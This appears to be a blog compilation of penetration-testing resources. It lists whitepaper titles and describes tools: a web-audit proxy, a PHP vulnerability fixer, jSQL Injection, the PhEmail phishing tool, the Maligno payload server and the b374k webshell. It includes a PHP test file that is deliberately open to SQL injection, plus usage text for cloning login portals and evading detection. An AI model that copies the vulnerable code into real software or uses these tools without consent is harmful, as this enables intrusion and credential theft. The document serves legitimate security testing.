WATOBO is intended to enable security professionals to perform highly efficient (semi-automated) web application security audits. I am convinced that the semi-automated approach is the best way to perform an accurate audit and to identify most of the vulnerabilities.

WATOBO has no attack capabilities and is provided for legal vulnerability audit purposes only. It works like a local proxy, similar to Webscarab, Paros or BurpSuite

Additionally, WATOBO supports passive and active checks. Passive checks are more like filter functions. They are used to collect useful information, e.g. email or IP addresses. Passive checks will be performed during normal browsing activities. No additional requests are sent to the (web) application.

Active checks instead will produce a high number of requests (depending on the check module) because they do the automatic part of vulnerability identification, e.g. during a scan.

The functions of WATOBO:

  • Supports session management.
  • Detects logout and automatically takes a re-login.
  • Supports filter functions
  • Inline-Encoder/Decoder
  • Includes vulnerability scanner
  • Quick-scan for targeted scanning a URL
  • Full-scan to scan a whole session
  • Manual request editor with special functions
  • Session information is updated
  • Login can be done automatically
  • Transcoder
  • URL, Base64, MD5, SHA-1
  • Interceptor
  • Fuzzer
  • Free, Stable and Open source!
  • Script code easy to understand
  • Easy to extend / adapt
  • In real-world scenarios tested and developed
  • Speed / usability
  • Active and Passive checks
  • Runs under Windows, Linux, BackTrack, MacOS

All these great features and functions make WATOBO one of the top free web assessment tools.

The program can be downloaded from: http://sourceforge.net/projects/watobo/

Pen Testing Resources: Whitepapers


White Papers are an excellent source for information gathering, problem-solving and learning. Below is a list of White Papers written by penetration testing practitioners seeking certification. SANS attempts to ensure the accuracy of information, but papers are published “as is”.

Errors or inconsistencies may exist or may be introduced over time. If you suspect a serious error, please contact webmaster@sans.org.

Featured Papers

This featured paper includes some really useful techniques that penetration testers should master. Read it, learn it, and live it, as you extend your skills.

Paper Author Certification
Practical El Jefe Vedaa, Charles GCIH
Correctly Implementing Forward Secrecy Schum, Chris GCIH
Powercat Douglas, Mick GPEN
Detecting Crypto Currency Mining in Corporate Environments D’Herdt, Jan GCIH
Penetration Testing: Alternative to Password Cracking Catanoi, Maxim GPEN
Automated Defense – Using Threat Intelligence to Augment Poputa-Clean, Paul GCIH
Cyber Breach Coaching Hoehl, Michael GCIH
AIX for penetration testers Panczel, Zoltan GPEN
Let’s face it, you are probably compromised. What next? Thyer, Jonathan GPEN
Secure Design with Exploit Infusion Wen Chinn, Yew GCIH
An Analysis of Meterpreter during Post-Exploitation Wadner, Kiel GCIH
Creating a Threat Profile for Your Organization Irwin, Stephen GCIH
Modeling Security Investments With Monte Carlo Simulations Lyon, Dan GWAPT
A Qradar Log Source Extension Walkthrough Stanton, Michael GCIH
Differences between HTML5 or AJAX web applications Thomassin, Sven GWAPT
Small devices needs a large Firewall Mastad, Paul GCIH
Are there novel ways to mitigate credential theft attacks in Windows? Foster, James GCIH
Digital Certificate Revocation Vandeven, Sally GCIH
Incident Response in a Microsoft SQL Server Environment Walker, Juan GCIH
Web Application Penetration Testing for PCI Hoehl, Michael GWAPT
Securing Aviation Avionics Panet-Raymond, Marc GCIH
iPwn Apps: Pentesting iOS Applications Kliarsky, Adam GPEN
Incident Handling Annual Testing and Training Holland, Kurtis GCIH
Rapid Triage: Automated System Intrusion Discovery with Python Bond, Trenton GCIH
Using Open Source Reconnaissance Tools for Business Partner Vulnerability Assessment Young, Sue GCIH
An Approach to Detect Malware Call-Home Activities Cui, Tianqiang GCIH
Active Security Or: How I learned to stop worrying and use IPS with Incident handling Brown, Douglas GCIH
War Pi Christie, Scott GCIH
Getting Started with the Internet Storm Center Webhoneypot Pokladnik, Mason GWAPT
Getting Started with the Internet Storm Center Webhoneypot Pokladnik, Mason GWAPT
Home Field Advantage: Employing Active Detection Techniques Jackson, Benjamin GCIH
Introduction to the OWASP Mutillidae II Web Pen-Test Training Environment Druin, Jeremy GWAPT
Talking Out Both Sides of Your Mouth: Streamlining Communication via Metaphor More, Josh GCIH
SMS, iMessage and FaceTime security Khalil, George GCIH
Using DomainKeys Identified Mail (DKIM) to Protect your Email Reputation Murphy, Christopher GCIH
Detecting Security Incidents Using Windows Workstation Event Logs Anthony, Russell GCIH
Web Application Injection Vulnerabilities: A Web App’s Security Nemesis? Couture, Erik GWAPT
Event Monitoring and Incident Response Boyle, Ryan GCIH
Website Security for Mobile Ho, Alan GWAPT
Web Log Analysis and Defense with Mod_Rewrite Wanner, Rick GCIH
How to identify malicious HTTP Requests Sarokaari, Niklas GWAPT
Exploiting Embedded Devices Jones, Neil GPEN
InfiniBand Fabric and Userland Attacks Warren, Aron GCIH
Incident Handling in the Healthcare Cloud: Liquid Data and the Need for Adaptive Patient Consent Management Filkins, Barbara GCIH
PDF Obfuscation – A Primer Robertson, Chad GPEN
Attributes of Malicious Files Yonts, Joel GCIH
Exploiting Financial Information Exchange (FIX) Protocol? DeMarco, Darren GCIH
Covert Channels Over Social Networks Selvi, Jose GCIH
Robots.txt Lehman, Jim GWAPT
Penetration Testing Of A Web Application Using Dangerous HTTP Methods Kim, Issac GWAPT
Shedding Light on Security Incidents Using Network Flows Gennuso, Kevin GCIH
In-house Penetration Testing for PCI DSS Koster, Jeremy GPEN
Remote Access Point/IDS Kee, Jared GCIH
Post Exploitation using Metasploit pivot & port forward Dodd, David GPEN
Quick and Effective Windows System Baselining and Comparative Analysis for Troubleshooting and Incident Response Fuller, Kevin GCIH
iPhone Backup Files. A Penetration Tester’s Treasure Manners, Darren GPEN
Mitigating Browser Based Exploits through Behavior Based Defenses and Hardware Virtualization Faust, Joseph GCIH
Securely deploying Android devices Alonso-Parrizas, Angel GCIH
Responding to Zero Day Threats Kliarsky, Adam GCIH
Practical OSSEC Robertson, Chad GCIH
Creating Your Own SIEM and Incident Response Toolkit Using Open Source Tools Sweeny, Jonny GCIH
An Overview Of The Casper RFI Bot O’Connor, Dan GCIH
Pass-the-hash attacks: Tools and Mitigation Ewaida, Bashar GCIH
Solution Architecture for Cyber Deterrence Mowbray, Thomas GPEN
Malicious Android Applications: Risks and Exploitation Boutet, Joany GPEN
Security Incident Handling in High Availability Environments Kibirkstis, Algis GCIH
Using Windows Script Host and COM to Hack Windows Ginos, Alexander GPEN
Effective Use Case Modeling for Security Information & Event Management Frye, Daniel GCIH
Penetration Testing in the Financial Services Industry Olson, Christopher GPEN
Which Disney© Princess are YOU? Brower, Joshua GCIH
Why Crack When You Can Pass the Hash? Hummel, Christopher GCIH
One Admin’s Documentation is their Hacker’s Pentest Vandenbrink, Robert GPEN
IOSTrojan: Who really owns your router? Santander Pelaez, Manuel Humberto GCIH
Visualizing the Hosting Patterns of Modern Cybercriminals Hunt, Drew GCIH
PCI DSS and Incident Handling: What is required before, during and after an incident Moldes, Christian GCIH
A Fuzzing Approach to Credentials Discovery using Burp Intruder Dawson, Karl GPEN
Incident Handlers Guide to SQL Injection Worms Folkerts, Justin GCIH
IOScat – a Port of Netcat’s TCP functions to Cisco IOS Vandenbrink, Robert GCIH
Bypassing Malware Defenses Christiansen, Morton GPEN
Investigative Tree Models Caudle, Rodney GCIH
A Guide to Encrypted Storage Incident Handling Shanks, Wylie GCIH
The SirEG Toolkit Begin, Francois GCIH
Incident Handling as a Service Lundell, Michel GCIH
Zombie profiling with SMTP greylisting Koster, Jeremy GCIH
Using OSSEC with NETinVM Allen, Jon Mark GCIH
Detecting Hydan: Statistical Methods For Classifying The Use Of Hydan Based Stegonagraphy In Executable Files Wright, Craig GCIH
Document Metadata, the Silent Killer… Pesce, Larry GCIH
Espionage – Utilizing Web 2.0, SSH Tunneling and a Trusted Insider Abdel-Aziz, Ahmed GCIH
Following Incidents into the Cloud Reed, Jeffrey GCIH
Covering the Tracks on Mac OS X Leopard Scott, Charles GCIH
Winquisitor: Windows Information Gathering Tool Cardosa, Michael GCIH
An approach to the ultimate in-depth security event management framework Pachis, Nicolas GCIH
Exploitation Kits Revealed – Mpack Martin, Andrew GCIH
Scareware Traversing the World via a Web App Exploit Hillick, Mark GCIH
Mining for Malware – There’s Gold in Them Thar Proxy Logs! Griffin, Joe GCIH
Detecting and Preventing Unauthorized Outbound Traffic Wippich, Brian GCIH
Virtual Rapid Response Systems Mohan, Chris GCIH
An Incident Handling Process for Small and Medium Businesses Pokladnik, Mason GCIH
Stack Based Overflows: Detect & Exploit Christiansen, Morton GCIH
Application Whitelisting: Panacea or Propaganda Beechey, Jim GCIH
Multi-Tool DVD Sets: An important addition to the Incident Handler/ Pen Tester’s toolkit Bandukwala, Jamal GCIH
Expanding Response: Deeper Analysis for Incident Handlers McRee, Russ GCIH
Pros and Cons of using Linux and Windows Live CDs in Incident Handling and Forensics Smith, Ricky GCIH
Inside-Out Vulnerabilities, Reverse Shells Hammer, Richard GCIH
DNS Sinkhole Bruneau, Guy GCIH
The December Storm of WMF: Preparation, Identification, and Containment of Exploits Voorhees, James GCIH
Cisco Security Agent and Incident Handling Farnham, Greg GCIH
A Practical Application of SIM/SEM/SIEM Automating Threat Identification Swift, David GCIH
Effectiveness of Antivirus in Detecting Metasploit Payloads Baggett, Mark GCIH
Network Covert Channels: Subversive Secrecy Sbrusch, Raymond GCIH
Utilizing “AutoRuns” To Catch Malware McMillan, Jim GCIH
Exploiting BlackICE When a Security Product has a Security Flaw Gara-Tarnoczi, Peter GCIH
Remote installation of VMware GSX and a virtual machine Condon, Ed GCIH
Valentine’s Surprise Firedragging in Action de Nie, Paula GCIH
Microsoft Windows Cursor and Icon Format Handling Vulnerability Perkins, Matthew GCIH
IBM AIX invscout Local Command Execution Vulnerability –HONORS Horwath, Jim GCIH
An Analysis of the Remote Code Execution Vulnerability as Described in Microsoft’s MS05-002 Security Bulletin Rose, Jerome GCIH
Identity Theft Made Easy Huber, Eric GCIH
0day targeted malware attack Villatte, Nicolas GCIH
Exploiting Microsoft Internet Explorer Cursor and Icon File Handling Vulnerability Chen, Jerry GCIH
Windows Internet Naming Service – An Exploit Waiting to Happen Berger, Jeremy GCIH
Incident Handler Case File: A New Twist to Social Engineering Hawkins, Ray GCIH
Exploiting Samba Buffer Overflow Vulnerability via MetaSploit Framework Ko, James GCIH
Local Privilege Escalation in Solaris 8 and Solaris 9 via Buffer Overflow in passwd(1) McAdams, Shaun GCIH
A Case Study in Solaris Sadmind Exploitation Nathoo, Karim GCIH
What is Santy bringing you this year? HONORS Danhieux, Pieter GCIH
rLogin Buffer Overflow Vulnerability – Solaris Corredor, Juan GCIH
Fun with Batch Files: The Muma Worm Mackey, David GCIH
A Picture is Worth 500 Malicious Dwords Hall, Timothy GCIH
Remote Exploitation of Icecast 2.0.1 Server Pittner, Jakub GCIH
Freezing Icecast in its Tracks McLaren, Jared GCIH
Microsoft Internet Explorer SP2 Fully Automated Remote Compromise Davies, Alan GCIH
Exploiting Internet Explorer via IFRAME Becher, Jim GCIH
Exploiting PHP code injection: phpMyAdmin Multiple Input Validation Vulnerabilities Kah, Fabrice GCIH
Ramen Worm Ives, Millie GCIH
Sub Seven: A Risk to Your Internet Security Ostrowski, Paul GCIH
Network Printers: Whose friend are they? Hutcheson, Lorna GCIH
WebDAV Buffer Overflow Vulnerability Beckley, Peter GCIH
Open Shares Vulnerability Hill, Siegfried GCIH
Simple Network Management Protocol: Now More than a “Default” Vulnerability Fluharty, Daniel GCIH
The Microsoft IIS 5.0 Internet Printing ISAPI Extension Buffer Overflow Clemenson, Christopher GCIH
The enemy within: Handling the Insider Threat posed by Shatter Attacks Layton, Meg GCIH
IP Masquerading Vulnerability for Linux 2.2.x – CVE-2000-0289 Baccam, Tanya GCIH
IIS 5 In-Process Table Privilege Escalation Vulnerability Fatnani, Kishin GCIH
Hijacked Server Serves Up Foreign Bootlegged Pornography Meyer, Russell GCIH
Multithreaded, Dictionary-Based, Brute Force Password Attack on Linksys BEFSR41 With Remote Management Enabled Using A Modified THC-Hydra Tool Kirch, Joel GCIH
The fascinating tale of a lame hacker, a Linux Box, and how I received permission to deploy my IDS Markham, George GCIH
Sun snmpXdmi Overflow Miller, Kevin GCIH
0x333hate.c: Samba Remote Root Exploit Embrich, Mark GCIH
Stay Alert While Browsing the Internet LaValley, Jim GCIH
Robbing the Bank with ITS/MHTML Protocol Handler Balcik, James GCIH
Exploit Analysis Jenkinson, John GCIH
FTP Port 21 “Friend or Foe” Support for the Cyber Defense Initiative Karrick, Stephen GCIH
Port 1433 Georgas, Mark GCIH
eMule Exploit Renna, Scott GCIH
Reverse Engineering Srvcp.exe Zeltser, Lenny GCIH
Widespread SNMP Vulnerabilities Brooks, Greg GCIH
A Weak Password And A Windows Rootkit: A Recipe For Trouble Ives, John GCIH
Incident Illustration – LoveLetter VBS Gerber, John GCIH
Phising Attack in Organizations: Incident Handlers Perspective Ong, Leonard GCIH
Revisiting the Code Red Worm White, Ravila GCIH
Linux NTPD Buffer Overflow Stadler, Philipp GCIH
The Blind Leading The Blind – Sadmind/IIS Worm Barger, Richard GCIH
Donald Dick 1.55 with Last Updated GUI Component from Version 1.53 Maglich, Ryan GCIH
BruteSSH2 – 21st Century War Dialer Thompson, Bill GCIH
Exploiting Vulnerabilities in Squirrelmail Bong, Kevin GCIH
Port 80 (HTTP) – Apache Web Server Chunk Handling Vulnerability Oksanen, Scott GCIH
Breaking Windows 2000 Passwords via LDAP Password Crackers Hamby, Charles GCIH
Dsniff and Switched Network Switching Bowers, Brad GCIH
Exploiting the LSASS Buffer Overflow Wohlberg, Jon GCIH
Code Red and the Unix Impact Mcguire, David GCIH
Port 443 and Openssl-too-open Lee, Chia-Ling GCIH
Hacker Techniques, Exploits, and Incident Handling Brooker, Denis GCIH
Incident Illustration – Corporate Compromise Hall, Russell GCIH
phpMyAdmin 2.5.7 – Input Validation Vulnerability Thurston, Tracy GCIH
FTP Security and the WU-FTP File Globbing Heap Corruption Vulnerability Webb, Warwick GCIH
Port 1433 Vulnerability: Unchecked Buffer in Password Encryption Procedure Bryner, Jeff GCIH
Windows Media Services NSIISLOG.DLL Remote Buffer Overflow Smith, Steve GCIH
Incident Illustration – Missing Files White, Scott GCIH
Importance of a Minor Incident: W32/Goner@MM Legary, Michael GCIH
Nimda – Surviving the Hydra Schmelzel, Paul GCIH
GIAC Certified Incident Handling Practical Yachera, Stanley GCIH
Incident Illustration – Mstream Gallo, Kenneth GCIH
Incident Illustration – HTTP Services Vulnerabilities Modelo Howard, Gaspar GCIH
Buffer Overflow in /bin/login Puusaari, Matthew GCIH
SQL Server Resolution Service Exploit in Action Hoover, James GCIH
GIAC GCIH Assignment – Pass Harrison, Daniel GCIH
An Attacker On RPC Compromised Remote VPN Host Runs Arbitrary Code on Microsoft Exchange Server 2000 Ho, Wai-Kit GCIH
The Search for “Kozirog” Weaver, Greg GCIH
How to Gain Control of a Windows 2000 Server Using the In-Process Table Privilege Escalation Exploit Stidham, Jonathan GCIH
SQL Slammer Worm Hayden, Chris GCIH
Welchia Worm vs. Policy Makers Fighting Malware with Policy, not with Fire Corll, Benjamin GCIH
Incident Ilustration Chervenka, Dan GCIH
Tracking the Back Orifice Trojan on a University Network Knudsen, Kent GCIH
First Response: An incident handling team learns a few lessons the hard way Cragg, David GCIH
Microsoft RPC-DCOM Buffer Overflow Attack using Dcom.c Farrington, Dean GCIH
Automated Execution of Arbitrary Code Using Forged MIME Headers in Microsoft Internet Explorer Winters, Scott GCIH
False Alarm…Or Was It? Lessons Learned from a Badly Handled Incident Graesser Williams, Dana GCIH
SQL Slammer and Other UDP Port 1434 Threats In support of the Cyber Defense Initiative Ray, Edward GCIH
Bad ESMTP Verb Usage Equals Bad Times for Exchange Smith, Aaron GCIH
Real Network’s Remote Server Remote Root Exploit Lastor, Michael GCIH
Wireless LAN Honeypots to Catch IEEE 802.11 Intrusions Mitchell, Gordon GCIH
Netscape Enterprise Server Denial of Service Exploit Smith, Tony GCIH
Back-Door’ed by the Slammer Hally, John GCIH
Eradicating the Masses & Round 1 with Phatbot? Fulton, Lora GCIH
FreeBSD 4.x local root vulnerability — exec() of shared signal handler Durkee, Ralph GCIH
Identifying and Handling a PHP Exploit Edelson, Eve GCIH
Exploiting Sambas SMBTrans2 Vulnerability Darrah, Byron GCIH
Relative Shell Path Vulnerability Evans, Earl GCIH
A Heap o’ Trouble: Heap-based flag insertion buffer overflow in CVS Conrad, Eric GCIH
Mutated Code Kopczynski, Tyson GCIH
Windows Shell Document Viewer shdocvw.dll Feature or Trojan Horse? Fenwick, Wynn GCIH
A J0k3r Takes Over Larrieu, Heather GCIH
Buffer overflow in BIND 8.2 via NXT records Talianek, Chris GCIH
Exploiting the MicrosoftWindows Task Scheduler ..job. Stack Overflow Vulnerability Wenchel, Kevin GCIH
Neptune.c the Birth of SYN Flood Attacks Cardinal, Steven GCIH
Apache Web Server Chunk Handling Vulnerability: An Exploit In Action Walker, Martin GCIH
My First Incident Handling Experience Kohli, Karmendra GCIH
ICQ URL Remote Exploitable Buffer Overflow de Beaupre, Adrien GCIH
Johnny and the Metasploit – “MICROSOFT LSASS MS04-011 OVERFLOW” ATTACK Greene, Richard GCIH
Lotus Notes Penetration Rademacher, Karl GCIH
System infiltration through Mercur Mail Server 4.2 Ben Alluch Ben Amar, Jamil GCIH
Session stealing with WebMin Murdoch, Don GCIH
Cisco IOS Type 7 Password Vulnerability Massey, Lee GCIH
The Cisco IPv4 Blocked Interface Exploit Johnson, Cortez GCIH
Phone Phreaking and Social Engineering Tuey, Richard GCIH
SMTP Loop Moderate Denial of Service: InterScan VirusWall NT & Lotus Domino Environment Roberts, Brian GCIH
Nachi to the Rescue? Griffith, Russ GCIH
Testing Web Applications for Malicious Input Attack Vulnerabilities Grill, Robert GCIH
Incident Illustration – Firewall Attack Reed, Bill GCIH
Incident Handling Without Guidelines McKellar, Neil GCIH
Attack of Slammer worm – A practical case study Huang, Dongmei GCIH
Combating the Nachia Worm in Enterprise Environments Johnson, Brad GCIH
Anna Kournikova Worm Ashworth, Robert GCIH
Exploiting the SSH CRC32 Compensation Attack Detector Vulnerability Williams, R. Michael GCIH
Traveling Through the OpenSSL Door Murphy, Keven GCIH
Catch the culprit! Perez, David GCIH
Illustration of VS.SST@mm Virus Incident Smith, Kevin GCIH
In Support of the Cyber Defense Initiative Kohlenberg, Toby GCIH
Incident Analysis in a Mid-Sized Company Garvin, Pete GCIH
All Your Base Are Belong To Someone Else: An Analysis Of The Windows Messenger Service Buffer Overflow Vulnerability Hewitt, Peter GCIH
Incident Illustration Black, Ronald GCIH
BackGate Kit: The Joy of “Experts” DePriest, Paul GCIH
A Management Guide to Penetration Testing Shinberg, David GCIH
Author Intruder Alert: Why Internal Security must not take a back seat. Hendrick, Jim GCIH
MS IIS CGI Filename Decode Error Vulnerability Shenk, Jerry GCIH
The t0rn Rootkit Craveiro, Paulo GCIH
At hacker’s mercy while surfing the web – A cross-zone scripting exploit for Internet Explorer Leibenzeder, Florian GCIH
A Buffer Overflow Exploit Against the DameWare Remote Control Software Strubinger, Ray GCIH
Discovering a Local SUID Exploit Pike, Jeff GCIH
Microsoft IIS Superfluous Decoding Vulnerability Orkin, Kevin GCIH
A Security Analysis of the Gnutella Peer-to-Peer Protocol Cheney, Kirk GCIH
SMTP – Always a victim of a good time Lock, James GCIH
Pass – Questions Stackhouse, Brent GCIH
A Two Stage Attack Using One-Way Shellcode Mathezer, Stephen GCIH
Once Bitten Twice Sly – Common Exploits Fueled by Common Mishap Melvin, John GCIH
KaZaA Media Desktop Virus: W32/kwbot Will, Rita GCIH
Real World ARP Spoofing Siles, Raul GCIH
BIND 8.2 NXT Remote Buffer Overflow Exploit Mcmahon, Robert GCIH
Incident Report for a Rootkit attack on a Fedora workstation Norman, Bonita GCIH
M@STER@GENTS: Masters of “SPAM” Ashland, Joanne GCIH
Support for the Cyber Defense Initiative Fresen, Lars GCIH
Penetration Testing of a Secure Network Pakala, Sangita GCIH
Local Exploit: dtprintinfo for Solaris 2.6 and 7 Sipes, Steven GCIH
PHP-Nuke: From SQL Injection to System Compromise Paynter, Eric GCIH
Employees Are Crackers Too Stapleton, Curt GCIH
Apache Web Server Chunk Handling Apache-nosejob.c Sarrazyn, Dieter GCIH
The Tactical Use of Rainbow Crack to Exploit Windows Authentication in a Hybrid Physical-Electronic Attack Mahurin, Mike GCIH
Incident Illustration – SGI Penetration Roth, Jeffrey GCIH
DreamFTP – The Nightmare Begins! Sorensen, Robert Peter GCIH
WU-FTPD Heap Corruption Vulnerability – HONORS Allen, Jennifer GCIH
Solaris in.lpd Remote Command Execution Vulnerability Seah, Meng Kuang GCIH
When Script-kiddies become the target, as well as the menace: A variant of the WU-FTPD File Globbing Heap Corruption Vulnerability Hall, Stephen GCIH
Deep Throat 3.1 Analysis Prue, Patrick GCIH
Exploiting the Microsoft Internet Explorer Malformed IFRAME Vulnerability Tu, Alan GCIH
What to do when you break WEP Wireless Security and the LAN Poer, Geoffrey GCIH
SMBdie’em All – Kill That Server Kirby, Craig GCIH
A Study of the o_wks.c Exploit for MS03-049 Arnoth, Eric GCIH
Jolt2 or “IP Fragment Re-assembly Beciragic, Jasmir GCIH

from: http://pen-testing.sans.org/resources/whitepapers

Pen Test Hackfest Summit 2014 and 2013 Documents / PDFs

SynAcktiv.com Digital Security Tools and Documents


TOOLS

PUBLICATIONS

2015

2014

2013

2012

2011

2010

2009

2008

  • VMware and virtualization security, OSSIR, Nicolas Collignon
  • Penetration testing Windows systems, Télécom Bretagne, Renaud Feil
  • Penetration testing web applications, Télécom ParisTech, Renaud Feil

2007

2006

2002

from: http://synacktiv.com/en/resources.html

WAP – Web Application Protection


WAP – Web Application Protection

WAP 2.0 is a source code static analysis and data mining tool to detect and correct input validation vulnerabilities in web applications written in PHP (version 4.0 or higher) and with a low rate of false positives.

WAP detects and corrects the following vulnerabilities:

  • SQL Injection (SQLI)
  • Cross-site scripting (XSS)
  • Remote File Inclusion (RFI)
  • Local File Inclusion (LFI)
  • Directory Traversal or Path Traversal (DT/PT)
  • Source Code Disclosure (SCD)
  • OS Command Injection (OSCI)
  • PHP Code Injection

This tool semantically analyses the source code. More precisely, it does taint analysis (data-flow analysis) to detect the input validation vulnerabilities. The aim of the taint analysis is to track malicious inputs inserted by entry points ($_GET, $_POST arrays) and to verify if they reaches some sensitive sink (PHP functions that can be exploited by malicious input). After the detection, the tool uses data mining to confirm if the vulnerabilities are real or false positives. At the end, the real vulnerabilities are corrected with the insertion of the fixes (small pieces of code) in the source code.

WAP is written in Java language and is constituted by three modules:

  • Code Analyzer: composed by tree generator and taint analyser. The tool has integrated a lexer and a parser generated by ANTLR, and based in a grammar and a tree grammar written to PHP language. The tree generator uses the lexer and the parser to build the AST (Abstract Sintatic Tree) to each PHP file. The taint analyzer performs the taint analysis navigating through the AST to detect potentials vulnerabilities.
  • False Positives Predictor: composed by a supervised trained data set with instances classified as being vulnerabilities and false positives and by the Logistic Regression machine learning algorithm. For each potential vulnerability detected by code analyser, this module collects the presence of the attributes that define a false positive. Then, the Logistic Regression algorithm receives them and classifies the instance as being a false positive or not (real vulnerability).
  • Code Corrector: Each real vulnerability is removed by correction of its source code. This module for the type of vulnerability selects the fix that removes the vulnerability and signalizes the places in the source code where the fix will be inserted. Then, the code is corrected with the insertion of the fixes and new files are created.

More information can be found at: http://sourceforge.net/projects/awap/files/

jSQL Injection – a java tool for automatic sql database injection.


jSQL Injection

jSQL Injection is a lightweight application used to find database information from a distant server. Tool is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

jSQL Injection alpha-v0.6.0

jSQL

Features:

  • GET, POST, header, cookie methods
  • Normal, error based, blind, time based algorithms
  • Automatic best algorithm selection
  • Multi-thread control (start/pause/resume/stop)
  • Progression bars
  • Shows URL calls
  • Simple evasion
  • Proxy setting
  • Distant file reading
  • Webshell deposit
  • Terminal for webshell commands
  • Configuration backup
  • Update checker
  • Admin page checker
  • Brute forcer (md5 mysql…)
  • Coder (encode decode base64 hex md5…)
  • Supports MySQL

Injection and local test

Running injection requires the URL of a local or distant server, and the name of parameter to inject.
For a local test, you can save the following PHP code into file ‘simulate_get.php’ and move it to the root folder of your web server (e.g /www), then use http://127.0.0.1/simulate_get.php?lib=  and finally click Connect to read the local database:

<?php
    mysql_connect("localhost","root","");
    mysql_select_db("my_own_database");

    $result = mysql_query("SELECT * FROM my_own_table where my_own_field = ". $_GET['lib'])# time based
        ordie( mysql_error());# error based

    if( mysql_num_rows($result)!==0) echo " something ";# blind

    while( $row = mysql_fetch_array($result, MYSQL_NUM))
        echo join(',',$row);# normal?>

jsq3 

More information can be found at: https://github.com/ron190/jsql-injection

sn00p – a modular tool written in bourne shell and designed to chain and automate security tools and tests.


sn00p

sn00p is a modular tool written in bourne shell and designed to chain and automate security tools and tests. It parses target definitions from the command line and runs corresponding modules afterwards. Also, tool can parse a given nmap logfile for open tcp and udp ports. All results will be logged in specified directories and a report can subsequently be generated.

It is easy to adjust tool according to your needs by simply adding your own modules and audits.

sn00p is NOT intended to be a security framework or scanner! It is up to the user to define his own modules and audits. The predefined modules are written as examples using well-known tools and test scenarios.

sn00p has 6 module directories: 

  •  host
  •  tcp
  •  udp
  •  web
  •  lan
  •  wlan



These directories contain predefined modules with well-known security tools and tests.



Audits are defined in modules. They are subroutines, which run basically any security tools and tests and log the results in logfiles

More information can be found at: http://nullsecurity.net/tools/automation.html

PhEmail – a python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test


PhEmail

PhEmail is a python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test. The main purpose of PhEmail is to send a bunch of phishing emails and prove who clicked on them without attempting to exploit the web browser or email client but collecting as much information as possible. PhEmail comes with an engine to garther email addresses through LinkedIN, useful during the information gathering phase. Also, this tool supports Gmail authentication which is a valid option in case the target domain has blacklisted the source email or IP address. Finally, this tool can be used to clone corporate login portals in order to steal login credentials.

PhEmail phishing-testing

In recent years networks have become more secure through server hardening and deployment of security devices such as firewalls and intrusion prevention systems. This has made it harder for hackers and cyber criminals to launch successful direct attacks from outside of the network perimeter. As a result, hackers and cyber criminals are increasingly resorting to indirect attacks through social engineering and phishing emails.

What are social engineering and phishing attacks?

Social engineering is the art of tricking people into performing actions or revealing information with the aim of gaining access to information systems or confidential information. There are several social engineering attacks and techniques such as phishing emails, pretexting and tailgating.

Phishing is one of the easiest and most widely used social engineering attacks, where the attackers send spoofed emails that appear to be from a trusted individual or company such as a colleague or a supplier. The emails will often look identical to legitimate emails and will include company logos and email signatures. Once attackers successfully trick the victim into clicking on a malicious link or opening a booby-trapped document, they can bypass the company’s external defence mechanisms and gain a foothold in the internal network. This could allow them to gain access to sensitive and confidential information which might have financial or reputational consequences.

Installation

You can download the latest version of PhEmail by cloning the GitHub repository:

git clone https://github.com/Dionach/PhEmail

Usage

PHishing EMAIL tool v0.13
Usage: phemail.py [-e <emails>] [-m <mail_server>] [-f <from_address>] [-r <replay_address>] [-s <subject>] [-b <body>]
          -e    emails: File containing list of emails (Default: emails.txt)
          -f    from_address: Source email address displayed in FROM field of the email (Default: Name Surname <name_surname@example.com>)
          -r    reply_address: Actual email address used to send the emails in case that people reply to the email (Default: Name Surname <name_surname@example.com>)
          -s    subject: Subject of the email (Default: Newsletter)
          -b    body: Body of the email (Default: body.txt)
          -p    pages: Specifies number of results pages searched (Default: 10 pages)
          -v    verbose: Verbose Mode (Default: false)
          -l    layout: Send email with no embedded pictures 
          -B    BeEF: Add the hook for BeEF
          -m    mail_server: SMTP mail server to connect to
          -g    Google: Use a google account username:password
          -t    Time delay: Add deleay between each email (Default: 3 sec)
          -R    Bunch of emails per time (Default: 10 emails)
          -L    webserverLog: Customise the name of the webserver log file (Default: Date time in format "%d_%m_%Y_%H_%M")
          -S    Search: query on Google
          -d    domain: of email addresses
          -n    number: of emails per connection (Default: 10 emails)
          -c    clone: Clone a web page
          -w    website: where the phishing email link points to
          -o    save output in a file
          -F    Format (Default: 0): 
                0- firstname surname
                1- firstname.surname@example.com
                2- firstnamesurname@example.com
                3- f.surname@example.com
                4- firstname.s@example.com
                5- surname.firstname@example.com
                6- s.firstname@example.com
                7- surname.f@example.com
                8- surnamefirstname@example.com
                9- firstname_surname@example.com 

Examples: phemail.py -e emails.txt -f "Name Surname <name_surname@example.com>" -r "Name Surname <name_surname@example.com>" -s "Subject" -b body.txt
          phemail.py -S example -d example.com -F 1 -p 12
          phemail.py -c https://example.com

Usage of PhEmail for attacking targets without prior mutual consent is illegal

What can you do to protect yourself?

These attacks rely on and exploit weaknesses in human nature. Companies can take several steps to protect themselves and reduce the likelihood of such attacks being successful. The first step is to build a good security training and awareness program in which staff members are taught the dangers of phishing emails and how to identify such emails. The second step is to conduct regular client-side and social engineering tests which include sending targeted phishing emails. This would help the company evaluate the effectiveness of the security training and awareness program and how to improve it to try and eliminate the risk of such attacks.

More information can be found at: https://github.com/Dionach/PhEmail

Maligno – an open source penetration testing tool written in Python that serves Metasploit payloads.


Maligno

Maligno is an open source penetration testing tool written in python, that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded with Base64 prior to transmission.

Maligno comes with a client tool, which is a modified version of David Kennedy’s PyInjector. Such modified client implements HTTP, HTTPS and encryption capabilities. The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine. As a result, you should get your Metasploit session while avoiding detection.

More information can be found at: http://www.encripto.no/tools/

b374k – PHP Webshell with handy features


b374k – PHP Webshell with handy features

This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser

Features:

  • File manager (view, edit, rename, delete, upload, download, archiver, etc)
  • Search file, file content, folder (also using regex)
  • Command execution
  • Script execution (php, perl, python, ruby, java, node.js, c)
  • Give you shell via bind/reverse shell connect
  • Simple packet crafter
  • Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
  • SQL Explorer
  • Process list/Task manager
  • Send mail with attachment (you can attach local file on server)
  • String conversion
  • All of that only in 1 file, no installation needed
